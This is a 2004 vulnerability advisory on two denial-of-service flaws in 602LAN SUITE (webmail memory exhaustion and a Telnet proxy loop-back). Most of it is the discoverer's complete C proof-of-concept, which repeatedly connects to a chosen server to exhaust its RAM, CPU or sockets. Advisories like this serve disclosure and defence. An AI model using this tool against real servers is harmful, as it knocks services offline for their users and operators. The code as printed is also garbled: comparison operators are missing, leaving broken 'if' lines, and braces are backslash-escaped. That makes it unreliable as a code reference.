Reported November 7, 2004, by Luigi Auriemma

VERSIONS AFFECTED

  • 602LAN SUITE version 2004.0.04.0909

DESCRIPTION
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's 602LAN SUITE version 2004.0.04.0909 and prior. These two vulnerabilities include:

  • Resource consumption through Web mail
    An attacker can use the Web mail service (/mail) to consume the remote server's CPU and memory. The attacker uses the POST request with a Content-Length value that specifies the desired amount of memory to consume and specifies the subsequent closing of the connection without the need to send the specified data. The duration of the effect of each malformed request depends on the amount of data specified.
  • Sockets consumption through a Telnet proxy loop
    The Telnet proxy is vulnerable to a loop-back attack. It correctly prevents user requests from connecting to the IP address 127.0.0.1, but it doesn't apply the same filter to the server's other network interfaces, so an attacker can force the server to connect to its own local IP addresses, thus consuming all its sockets.

DEMONSTRATION
The discoverer posted the following code to demonstrate proof of concept:

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define EATRAM 52428800
#define MEM "POST /mail HTTP/1.1\r\n" \
                "Host: localhost\r\n" \
                "Content-Type: application/x-www-form-urlencoded\r\n" \
                "Content-Length: %d\r\n" \
                "\r\n" \
                "none"

int timeout(int sock, int secs);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv\[\]) \{
    int sd,
            len,
            pcklen,
            attack;
    u_short port;
    u_char buff\[BUFFSZ\],
            pck\[BUFFSZ\];
    struct sockaddr_in peer;

    setbuf(stdout, NULL);

    fputs("\n"
        "602 Lan Suite <= 2004.0.04.0909 resources consumption "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 4) \{
        printf("\n"
            "Usage: %s <attack> <server> <port>\n"
            "\n"
            "Attack:\n"
            "1 = CPU 100%% and memory eating through webmail service (m602cl3w): will be\n"
            " made infinite connections eating %d megabytes of RAM each time, default\n"
            " port of this service is 80\n"
            "2 = sockets consumption through telnet proxy loop, default port is 23\n"
            "\n", argv\[0\], EATRAM >> 20);
        exit(1);
    \}

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    port = atoi(argv\[3\]);
    peer.sin_addr.s_addr = resolv(argv\[2\]);
    peer.sin_port = htons(port);
    peer.sin_family = AF_INET;

    printf("- target %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    attack = atoi(argv\[1\]);
    if(attack

1) \{
        pcklen = sprintf(pck, MEM, EATRAM);
        printf(
            "- CPU and memory consumption attack: note that the RAM on the server will\n"
            " start to be eaten after about 15 seconds, so wait and keep sysmon or other\n"
            " resource monitors opened on the server to watch the real effects\n"
            " Will be eaten %d bytes of memory for each connection\n",
            EATRAM >> 20);

        for(;;) \{
            sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
            if(sd < 0) std_err();

            fputs("- connection: ", stdout);
            if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();

            if(send(sd, pck, pcklen, 0)
              < 0) std_err();

            if(timeout(sd, 1) < 0) \{
                fputs("ok\n", stdout);
            \} else \{
                fputs("rejected\n", stdout);
            \}

            close(sd);
        \}

    \} else if(attack

2) \{
        pcklen = sprintf(pck, "%s:%d\r\n", inet_ntoa(peer.sin_addr), port);
        fputs(
            "- sockets consumption attack: when you will see no new output on the screen\n"
            " means the server has finished all its available sockets\n",
            stdout);

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        for(;;) \{
            if(send(sd, pck, pcklen, 0)
              < 0) std_err();

            if(timeout(sd, 3) < 0) \{
                fputs("\nServer seems vulnerable!\n", stdout);
            \}

            len = recv(sd, buff, BUFFSZ, 0);
            if(len < 0) std_err();
            if(!len) break;
            buff\[len\] = 0x00;
            printf("%s\n", buff);
        \}
        close(sd);
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);

    \} else \{
        fputs("\nError: you must choose an attack, 1 or 2\n\n", stdout);
    \}

    return(0);
\}

int timeout(int sock, int secs) \{
    struct timeval tout;
    fd_set fd_read;
    int err;

    tout.tv_sec = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
\}

u_long resolv(char *host) \{
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) \{
        hp = gethostbyname(host);
        if(!hp) \{
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        \} else host_ip = *(u_long *)(hp->h_addr);
    \}
    return(host_ip);
\}

#ifndef WIN32
    void std_err(void) \{
        perror("\nError");
        exit(1);
    \}
#endif

VENDOR RESPONSE
Software602 advises users to upgrade to 602LAN SUITE version 2004.0.04.1104 or later.

CREDIT
Discovered by Luigi Auriemma.